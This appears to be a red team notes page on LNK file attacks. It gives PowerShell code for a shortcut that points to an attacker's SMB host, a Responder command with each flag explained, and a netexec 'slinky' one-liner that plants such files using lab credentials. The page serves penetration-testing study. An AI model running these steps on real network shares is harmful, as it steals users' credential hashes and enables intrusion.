LNK File Attacks

If we have access to a share, we can put there a malicious file. On the other end we can have responder. Once the file is opened we get the hash

Manual way

Step 1 - create a malicious LNK file

Create a file linking to our Kali Running responder

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\192.168.145.141\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Put the shortcut in shared folder.

Step 2 - run the responder

sudo responder -I eth0 -v -dP

sudo: Runs Responder with root privileges (required).
responder: The main script to run the Responder tool.
-I eth0: Specifies the network interface to listen on (e.g., eth0).
-v: Enables verbose output.
-d: Enables NBT-NS (NetBIOS Name Service) poisoning.
-P: Enables WPAD (Web Proxy Auto-Discovery Protocol) rogue proxy.

Step 3 Exploit

Run the shortcut file and we will have a hash.

Automated Way

Netexec can do it automatically. (slinky module)

netexec smb 192.168.138.137 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.138.149

It autocreates a LNK file.

Forced Authentication | Red Team Notes

PreviousToken Impersonation NextMiscellaneous Misconfigurations

Last updated 24 days ago